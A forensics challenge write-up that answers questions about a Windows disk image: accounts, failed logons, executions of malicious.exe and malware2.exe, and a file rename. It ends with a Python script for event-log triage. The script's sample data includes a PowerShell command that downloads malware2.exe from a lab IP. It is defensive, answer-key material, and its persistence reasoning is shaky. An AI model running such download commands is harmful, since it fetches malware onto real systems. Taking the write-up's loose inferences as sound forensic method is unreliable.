# Evaluation Challenge Write Up

## What is the name of the computer?

![](https://i.imgur.com/7FIztPH.png)

Computer Name : **DESKTOP-SUMKS54**

Path : SYSTEM\ControlSet001\Control\ComputerName\ComputerName

Location of the artifact :

* Evidence.E01\Basic data partition (3) [40630MB]\NONAME [NTFS]\[root]\Windows\System32\config\SYSTEM

Tools Used :

* FTK Imager
* Registry Explorer

## Who dropped the suspicious binary to disk?

![](https://i.imgur.com/PSBCfcs.png)

**Craig Johnson** dropped the binary to disk.

Path : Software\Microsoft\Windows\CurrentVersion\Run

![](https://i.imgur.com/5JJTUYO.png)

Event Log : Security.evtx

From the above figure we can see that **Craig Johnson** executed the malicious script and dropped the binary onto the disk.

Location of the artifacts :

* Evidence.E01\Basic data partition (3) [40630MB]\NONAME [NTFS]\[root]\Users\Craig Johnson\NTUSER.DAT
* Evidence.E01\Basic data partition (3) [40630MB]\NONAME [NTFS]\[root]\Windows\System32\winevt\Logs\Security.evtx

Tools Used :

* FTK Imager
* Registry Explorer
* Event Viewer

## Where was the suspicious binary acquired from?

The suspicious binary was acquired from the Downloads folder of **Craig Johnson**.

![](https://i.imgur.com/fjRudbP.png)

Path :

* Evidence.E01\Basic data partition (3) [40630MB]\NONAME [NTFS]\[root]\Users\Craig Johnson\Downloads\malicious.exe

Tools Used :

* FTK Imager
* Registry Explorer

## When were the user accounts Alissa Miller & Ravi created?

![](https://i.imgur.com/K0nuNGE.png)

Alissa Miller's profile was created on **2022-04-09 09:07:27**

Ravi's profile was created on **2022-04-09 09:07:59**

Location of the artifact :

* Evidence.E01\Basic data partition (3) [40630MB]\NONAME [NTFS]\[root]\Windows\System32\config\SAM

Path : SAM\Domains\Account\Users

Tools Used :

* FTK Imager
* Registry Explorer

## How many times did the user Alissa Miller enter a wrong password during login?
![](https://i.imgur.com/VibDWfu.png)

Alissa Miller entered a wrong password **5** times.

Using event ID 4625 we can filter the failed logon events and then search for Account Name : Alissa Miller to count them.

Location of the Artifact :

* Evidence.E01\Basic data partition (3) [40630MB]\NONAME [NTFS]\[root]\Windows\System32\winevt\Logs\Security.evtx

Tools Used :

* FTK Imager
* Event Viewer

## There is another suspicious binary present on disk. What is the IP from which it was downloaded?

The other suspicious binary present on the disk was downloaded from the IP address **192.168.56.1**.

![](https://i.imgur.com/a3UA6s0.png)

The above snippet was taken from the **_Microsoft-Windows-PowerShell%4Operational_** event log; in it we can see that malware2.exe is being downloaded from the web server with the IP address 192.168.56.1.

Location of the Artifact :

* Evidence.E01\Basic data partition (3) [40630MB]\NONAME [NTFS]\[root]\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx

Tools Used :

* Event Viewer
* FTK Imager

## Does any of the suspicious binaries have persistence in the system? Please provide all the details you can.

Yes, the suspicious binary has persistence in the system; it is accessing many important parts of the OS such as PowerShell and cmd.

![](https://i.imgur.com/gpL6Hxd.png)

![](https://i.imgur.com/2EVmeNy.png)

Once it has access to PowerShell and the cmd prompt, it can gain full access to the system. So the suspicious binary has persistence in the system. The Run key noted above in Craig Johnson's NTUSER.DAT (Software\Microsoft\Windows\CurrentVersion\Run) is also an autostart location for the binary.

Location of the Artifact :

* Evidence.E01\Basic data partition (3) [40630MB]\NONAME [NTFS]\[root]\Windows\System32\winevt\Logs\Security.evtx

Tools Used :

* FTK Imager
* Event Viewer

## How many times was the original suspicious binary run & what are the timestamps of both the executions?
malicious.exe was executed **2** times.

![](https://i.imgur.com/Ughy3Ez.png)

In the Security.evtx log we can filter the executed programs with the help of event ID 4688, then use the option _Save all events in custom view as CSV_, open the CSV in any CSV viewer and search for `malicious.exe`; this gives us the number of times `malicious.exe` was executed.

**Timestamps of both executions**

```
TimeCreated [ SystemTime] 2022-04-09T09:31:50.8154385Z
EventRecordID 75238
```

```
TimeCreated [ SystemTime] 2022-04-09T09:31:47.0587933Z
EventRecordID 75225
```

Location of the Artifact :

* Evidence.E01\Basic data partition (3) [40630MB]\NONAME [NTFS]\[root]\Windows\System32\winevt\Logs\Security.evtx

Tools Used :

* FTK Imager
* Event Viewer

## Did the other suspicious binary execute in the system?

Yes, it was executed **1** time.

![](https://i.imgur.com/lKmPl2t.png)

In the Security.evtx log we can filter the executed programs with the help of event ID 4688, then use the option _Save all events in custom view as CSV_, open the CSV in any CSV viewer and search for malware2.exe; this gives us the number of times malware2.exe was executed.

```
TimeCreated [ SystemTime] 2022-04-09T09:31:51.2263011Z
EventRecordID 75258
```

Location of the Artifact :

* Evidence.E01\Basic data partition (3) [40630MB]\NONAME [NTFS]\[root]\Windows\System32\winevt\Logs\Security.evtx

Tools Used :

* FTK Imager
* Event Viewer

## When was the file "World Hello.txt" renamed to its current name?

![](https://i.imgur.com/83lGUTQ.png)

The above snippet was taken from the NTUSER.DAT of user Ravi; NTUSER.DAT stores all the information related to that particular user. In the RecentDocs key we can find that there is only one text file, which was last accessed at 2022-04-09 09:28:24.
Path : Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.txt

![](https://i.imgur.com/DTtev8Q.png)

The above picture shows the Documents directory of user Ravi, in which we can find the _.txt_ file that was last modified on 09-04-2022 09:28:33.

Both of the above refer to the same file: if they were different files, the RecentDocs key in Ravi's NTUSER.DAT would contain two different entries, but there is only one. So `Hello World.txt` was renamed to `World Hello.txt` at **09-04-2022 09:28:33**.

Location of the Artifact :

* Evidence.E01\Basic data partition (3) [40630MB]\NONAME [NTFS]\[root]\Users\Ravi\NTUSER.DAT

Tools Used :

* FTK Imager
* Registry Explorer
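The event-log questions above (the 4625 wrong-password count, the 4688 execution counts and timestamps for malicious.exe and malware2.exe, and the download IP from the PowerShell Operational log) were all answered by filtering in Event Viewer and exporting to CSV. The script below is an added example, not code from the write-up, that does the same triage programmatically over records exported from Event Viewer as XML. It assumes the standard Windows event XML schema (namespace `http://schemas.microsoft.com/win/2004/08/events/event`); the sample records embedded in it are constructed for the example and only reuse the account names, image names, IP and timestamps from the write-up as placeholders, so they are not taken from the evidence image.

```python
"""Triage helpers for Windows event records exported as XML.

Added example for this write-up, not the author's code. Event Viewer can save a
filtered view as XML; each record is an <Event> in the namespace
http://schemas.microsoft.com/win/2004/08/events/event with <System> fields and
<EventData><Data Name="..."> fields. The records in SAMPLE_EVENTS_XML are
constructed for the example (names and values reused from the write-up as
placeholders), not exported from the evidence.
"""
import re
import xml.etree.ElementTree as ET
from collections import Counter

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
BAD_PASSWORD_SUBSTATUS = "0xc000006a"  # NTSTATUS STATUS_WRONG_PASSWORD in a 4625 SubStatus


def _event(event_id, time, record_id, **data):
    """Build one constructed <Event> record string (sample data only)."""
    fields = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID>'
            f'<TimeCreated SystemTime="{time}"/><EventRecordID>{record_id}</EventRecordID>'
            f'</System><EventData>{fields}</EventData></Event>')


# Constructed sample: four logon failures, four process creations, one script block.
SAMPLE_EVENTS_XML = "<Events>" + "".join([
    _event(4625, "2022-04-09T09:12:00.0000000Z", 1001, TargetUserName="Alissa Miller", SubStatus="0xc000006a"),
    _event(4625, "2022-04-09T09:12:05.0000000Z", 1002, TargetUserName="Alissa Miller", SubStatus="0xc000006a"),
    _event(4625, "2022-04-09T09:12:09.0000000Z", 1003, TargetUserName="Alissa Miller", SubStatus="0xc0000234"),
    _event(4625, "2022-04-09T09:13:00.0000000Z", 1004, TargetUserName="Ravi", SubStatus="0xc000006a"),
    _event(4688, "2022-04-09T09:31:47.0587933Z", 75225, NewProcessName=r"C:\Users\Craig Johnson\Downloads\malicious.exe"),
    _event(4688, "2022-04-09T09:31:48.0000000Z", 75230, NewProcessName=r"C:\Windows\System32\notepad.exe"),
    _event(4688, "2022-04-09T09:31:50.8154385Z", 75238, NewProcessName=r"C:\Users\Craig Johnson\Downloads\malicious.exe"),
    _event(4688, "2022-04-09T09:31:51.2263011Z", 75258, NewProcessName=r"C:\Users\Ravi\malware2.exe"),
    _event(4104, "2022-04-09T09:31:49.0000000Z", 4401,
           ScriptBlockText="Invoke-WebRequest http://192.168.56.1:8000/malware2.exe -OutFile malware2.exe"),
]) + "</Events>"


def parse_events(xml_text):
    """Flatten each <Event> into a dict: System fields plus every EventData <Data Name=...> value."""
    events = []
    for ev in ET.fromstring(xml_text).findall("e:Event", NS):
        rec = {
            "EventID": int(ev.findtext("e:System/e:EventID", namespaces=NS)),
            "TimeCreated": ev.find("e:System/e:TimeCreated", NS).get("SystemTime"),
            "EventRecordID": int(ev.findtext("e:System/e:EventRecordID", namespaces=NS)),
        }
        for d in ev.findall("e:EventData/e:Data", NS):
            rec[d.get("Name")] = d.text or ""
        events.append(rec)
    return events


def failed_logons_by_account(events, bad_password_only=False):
    """Count 4625 logon failures per TargetUserName.

    With bad_password_only=True only failures whose SubStatus is STATUS_WRONG_PASSWORD
    are counted, which separates real wrong passwords from lockouts and other failures.
    """
    counts = Counter()
    for e in events:
        if e["EventID"] != 4625:
            continue
        if bad_password_only and e.get("SubStatus", "").lower() != BAD_PASSWORD_SUBSTATUS:
            continue
        counts[e["TargetUserName"]] += 1
    return counts


def process_executions(events, image_name):
    """(SystemTime, EventRecordID) for each 4688 whose NewProcessName basename is image_name, oldest first."""
    hits = [(e["TimeCreated"], e["EventRecordID"]) for e in events
            if e["EventID"] == 4688
            and e.get("NewProcessName", "").rsplit("\\", 1)[-1].lower() == image_name.lower()]
    return sorted(hits)


URL_RE = re.compile(r"https?://([^/\s:'\"]+)", re.IGNORECASE)


def download_sources(events):
    """Map each host/IP in a 4104 script block URL to the record ids of the blocks that used it."""
    sources = {}
    for e in events:
        if e["EventID"] != 4104:
            continue
        for host in URL_RE.findall(e.get("ScriptBlockText", "")):
            sources.setdefault(host, []).append(e["EventRecordID"])
    return sources


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS_XML)
    print("failed logons:", dict(failed_logons_by_account(evs)))
    print("wrong password only:", dict(failed_logons_by_account(evs, bad_password_only=True)))
    for image in ("malicious.exe", "malware2.exe"):
        print(image, process_executions(evs, image))
    print("download sources:", download_sources(evs))
```

On a real case the 4625 and 4688 records come from the Security.evtx export and the 4104 records from the Microsoft-Windows-PowerShell%4Operational.evtx export, so `parse_events` is run once per file. A plain 4625 count, as used in the write-up, includes every failure reason for the account; checking the SubStatus (0xC000006A for a wrong password, 0xC0000234 for a locked-out account) tells wrong-password attempts apart from the other failures.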